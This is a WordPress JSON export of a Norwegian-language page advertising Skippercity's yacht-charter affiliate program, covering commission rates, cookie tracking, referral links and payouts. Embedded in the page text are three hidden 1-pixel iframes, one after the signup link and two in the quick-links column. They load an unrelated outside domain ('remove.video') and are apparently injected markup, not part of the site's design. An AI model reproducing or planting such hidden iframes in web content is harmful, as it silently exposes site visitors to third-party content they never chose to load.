{"id":412119,"date":"2024-01-15T12:32:29","date_gmt":"2024-01-15T12:32:29","guid":{"rendered":"https:\/\/www.skippercity.com\/yacht-charter-affiliate-program\/"},"modified":"2024-02-21T11:19:51","modified_gmt":"2024-02-21T11:19:51","slug":"yacht-charter-affiliate-program","status":"publish","type":"page","link":"https:\/\/skippercity.com\/no\/yacht-charter-affiliate-program\/","title":{"rendered":"Yacht Charter Affiliate Program"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"412119\" class=\"elementor elementor-412119 elementor-412040\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1250e588 elementor-section-full_width elementor-section-height-min-height elementor-section-items-stretch elementor-section-content-middle elementor-section-height-default\" data-id=\"1250e588\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9f1c76f\" data-id=\"9f1c76f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4a4f0833 elementor-widget elementor-widget-heading\" data-id=\"4a4f0833\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Yacht Charter Affiliate Program<\/h1>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4eaa1748 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4eaa1748\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-25087f4b\" data-id=\"25087f4b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-571c4982\" data-id=\"571c4982\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-66f25697\" data-id=\"66f25697\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4518a569 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4518a569\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-4a55adf6\" data-id=\"4a55adf6\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-225b732b elementor-widget elementor-widget-text-editor\" data-id=\"225b732b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\"><strong>Kjappe fakta:<\/strong><\/span><\/p>\n<ul>\n<li>H\u00f8yest betalende affiliate-program<\/li>\n<li>20-25 % fra v\u00e5r provisjon p\u00e5 b\u00e5tutleie<\/li>\n<li>Livsvarige provisjoner<\/li>\n<li>365 dagers utl\u00f8psdato for informasjonskapsler<\/li>\n<\/ul>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-16c35e15 elementor-widget elementor-widget-table-of-contents\" data-id=\"16c35e15\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;exclude_headings_by_selector&quot;:[],&quot;headings_by_tags&quot;:[&quot;h2&quot;,&quot;h3&quot;,&quot;h4&quot;,&quot;h5&quot;,&quot;h6&quot;],&quot;marker_view&quot;:&quot;numbers&quot;,&quot;no_headings_message&quot;:&quot;No headings were found on this page.&quot;,&quot;hierarchical_view&quot;:&quot;yes&quot;,&quot;min_height&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]}}\" data-widget_type=\"table-of-contents.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-toc__header\">\n\t\t\t\t\t\t<h4 class=\"elementor-toc__header-title\">\n\t\t\t\tInnholdsfortegnelse\t\t\t<\/h4>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div id=\"elementor-toc__16c35e15\" class=\"elementor-toc__body\">\n\t\t\t<div class=\"elementor-toc__spinner-container\">\n\t\t\t\t<svg class=\"elementor-toc__spinner eicon-animation-spin e-font-icon-svg e-eicon-loading\" aria-hidden=\"true\" viewBox=\"0 0 1000 1000\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M500 975V858C696 858 858 696 858 500S696 142 500 142 142 304 142 500H25C25 237 238 25 500 25S975 237 975 500 763 975 500 975Z\"><\/path><\/svg>\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-70ed3a7f\" data-id=\"70ed3a7f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4c5b7b5f elementor-widget elementor-widget-text-editor\" data-id=\"4c5b7b5f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2>Yacht Charter Affiliate Program<\/h2>\n<p>Hvis du har en nettside med kunder som kan v\u00e6re interessert i \u00e5 leie yachter &#8211; seilb\u00e5ter, gulets, motoryachter, superyachter &#8211; omtrent hvor som helst i verden, vil vi v\u00e6re interessert i \u00e5 samarbeide med deg om et tilknyttet partnerskap.<\/p>\n<p><u><b>Vi elsker Partners!<\/b><\/u><\/p>\n<p>Yachtco Affiliate Program lar deg begynne \u00e5 tjene penger p\u00e5 yachtcharter ved \u00e5 legge til en lenke fra nettstedet ditt til v\u00e5rt.<\/p>\n<h2>Hvordan virker det?<\/h2>\n<p>N\u00e5r en kunde <strong>klikker p\u00e5 lenken din p\u00e5 nettsiden din<\/strong> (eller bloggen eller sosiale medier), havner p\u00e5 siden v\u00e5r, og deretter charter en b\u00e5t via oss, krediteres en prosentandel av provisjonen til deg i henhold til v\u00e5re vilk\u00e5r og betingelser. Alt overv\u00e5kes (elektronisk og offline) og vi overv\u00e5ker leadstatusen for deg.<\/p>\n<p><strong>En megler (det vil si oss) tjener et gebyr<\/strong> p\u00e5 netto charterverdien av en b\u00e5tbestilling (ikke inkludert APA eller eventuelle ekstra varer eller tjenester som er bestilt). Denne provisjonen avhenger av plasseringen, b\u00e5ttypen og provisjonene til industrien. <strong>Affiliaten (det vil si deg) vil f\u00e5 20 %-25%<\/strong> som en grunnrente for denne avgiften opptjent fra megleren.<\/p>\n<p><b>Skippercity er stolte av \u00e5 f\u00f8lge opp alle charterkunder trofast, og derfor kompenseres tilknyttede selskaper ved \u00e5 tjene 20 %-25% av v\u00e5r provisjon p\u00e5 alle bestillinger av kunder som returnerer til oss.<\/b><\/p>\n<p>Systemet v\u00e5rt sporer kunder som tidligere har spurt fra en affiliate eller bestilt fra en affiliate, slik at vi alltid kan returnere provisjoner til affiliate. Skippercity vil respektere introduksjonen og tilby tilknyttede selskaper et introduksjonsgebyr hvis kunden returnerer til Skippercity utenfor tilknytningsprogrammet (dvs. ingen informasjonskapsler) for \u00e5 respektere lenken de har gitt oss, da de tidligere kom til oss etter \u00e5 ha spurt gjennom en affiliate.<\/p>\n<p>3000 EUR er den gjennomsnittlige netto charterverdien for \u00e5 begynne \u00e5 motta provisjonen din. V\u00e5re vilk\u00e5r og betingelser gjelder.<\/p>\n<p>Vi har m\u00e5ter \u00e5 sp\u00f8rre p\u00e5, stilige bilder og knapper for deg. Disse er alle tilgjengelige fra din tilknyttede &laquo;dashboard&raquo;, s\u00e5 alt du trenger \u00e5 gj\u00f8re er \u00e5 kopiere og lime inn koden p\u00e5 nettstedet ditt, og alle er klare til \u00e5 g\u00e5!<\/p>\n<p>Din URL for tilknyttede selskaper vil v\u00e6re https:\/\/skippercity.com\/?ref=brukernavn. Du installerer ganske enkelt koden (?ref=?ref=brukernavn) p\u00e5 slutten av enhver lenke til Skippercity, og alt overv\u00e5kes derfra!<\/p>\n<p><a href=\"https:\/\/skippercity.com\/no\/bli-var-samarbeidspartner\/\">Hvis du er interessert i \u00e5 registrere deg for v\u00e5rt tilknyttede program, klikker du bare her for \u00e5 registrere deg<\/a> , s\u00e5 behandler vi s\u00f8knaden din om \u00e5 bli med i programmet.<\/p>\n<p>Alt innhold p\u00e5 SkipperCity-nettstedet er opphavsrettsbeskyttet. Vi oppfordrer ikke v\u00e5re tilknyttede selskaper til \u00e5 bruke noe innhold p\u00e5 https:\/\/skippercity.com og \u00e5 kopiere eller duplisere materialet p\u00e5 sin egen nettside som sitt eget p\u00e5 en eller annen m\u00e5te. Men du m\u00e5 gjerne komme med ditt eget innhold og linke til oss.<\/p>\n<h2>Hvordan vi sporer salg<\/h2>\n<p>Alle kunder som kommer fra nettstedet ditt vil bli &laquo;cookies&raquo; og kontoen din vil bli koblet til med informasjonskapsler. N\u00e5r en oppdragsgiver sender oss en foresp\u00f8rsel eller oppretter konto hos oss, gj\u00f8r vi det vi kan best \u2013 anbefaler riktig b\u00e5t, ordner kontrakt og betalinger, og s\u00f8rger for at kunden kommer om bord.<\/p>\n<p>Hvis kunden som leier en b\u00e5t kommer fra nettstedet ditt, deler vi en del av provisjonen med deg.<\/p>\n<h2>Hvordan f\u00e5r du betalt?<\/h2>\n<p>Vi betaler v\u00e5re samarbeidspartnere via bankoverf\u00f8ring eller via Stripe.<\/p>\n<p>Tilknyttede selskaper vil bli betalt en m\u00e5ned etter charterets tilfredsstillende gjennomf\u00f8ring &#8211; dette er bransjenormen for alle interesserte parter. Alle deltakere f\u00e5r betalt ved vellykket gjennomf\u00f8ring av charter, fordi hvis det er noen problemer under charteren, \u00f8nsker vi \u00e5 sikre at meglere, yachtsjefer, skippere og eiere l\u00f8ser dem f\u00f8r kundene g\u00e5r i land fra yachten.<\/p>\n<p>For alle kansellerte charterturer (av kunder eller eiere), anses ikke tilknyttede selskaper, reisebyr\u00e5er og alle henvisninger som noen provisjon.<\/p>\n<h2>Slik registrerer du deg for affiliateprogrammet<\/h2>\n<p>Du m\u00e5 ha en eksisterende nettside, blogg eller sosialt nettverk med en kundebase som er komplement\u00e6r til yachtcharteren (reise, luksusprodukter, concierge-tjenester osv.) for \u00e5 s\u00f8ke om tilknyttede program.<\/p>\n<p>Du har ingen risiko eller utgifter for affiliateprogrammet. Alt du trenger \u00e5 gj\u00f8re er <a href=\"https:\/\/skippercity.com\/no\/bli-var-samarbeidspartner\/\">\u00e5 fylle ut v\u00e5rt nettskjema.<\/a><iframe style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/p>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-74185aa8 elementor-align-justify elementor-widget elementor-widget-button\" data-id=\"74185aa8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/skippercity.com\/no\/bli-var-samarbeidspartner\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Registrer deg for v\u00e5rt Yacht Charter-tilknyttede program<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-1b9e4a7d\" data-id=\"1b9e4a7d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7c060e83 elementor-widget elementor-widget-text-editor\" data-id=\"7c060e83\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\">Hurtigkoblinger:<\/span><\/p>\n<ul>\n<li><a href=\"https:\/\/skippercity.com\/no\/bli-var-samarbeidspartner\/\">Registrer deg\/registrer deg<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/no\/tilknyttet-palogging\/\">Logg Inn<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/no\/min-konto-2\/\">Din tilknyttede konto<\/a><\/li>\n<\/ul>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Yacht Charter Affiliate Program Kjappe fakta: H\u00f8yest betalende affiliate-program 20-25 % fra v\u00e5r provisjon p\u00e5 b\u00e5tutleie Livsvarige provisjoner 365 dagers utl\u00f8psdato for informasjonskapsler Innholdsfortegnelse Yacht Charter Affiliate Program Hvis du har en nettside med kunder som kan v\u00e6re interessert i \u00e5 leie yachter &#8211; seilb\u00e5ter, gulets, motoryachter, superyachter &#8211; omtrent hvor som helst i verden, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":408270,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-412119","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/skippercity.com\/no\/wp-json\/wp\/v2\/pages\/412119","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/skippercity.com\/no\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/skippercity.com\/no\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/skippercity.com\/no\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/skippercity.com\/no\/wp-json\/wp\/v2\/comments?post=412119"}],"version-history":[{"count":0,"href":"https:\/\/skippercity.com\/no\/wp-json\/wp\/v2\/pages\/412119\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/skippercity.com\/no\/wp-json\/wp\/v2\/media\/408270"}],"wp:attachment":[{"href":"https:\/\/skippercity.com\/no\/wp-json\/wp\/v2\/media?parent=412119"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}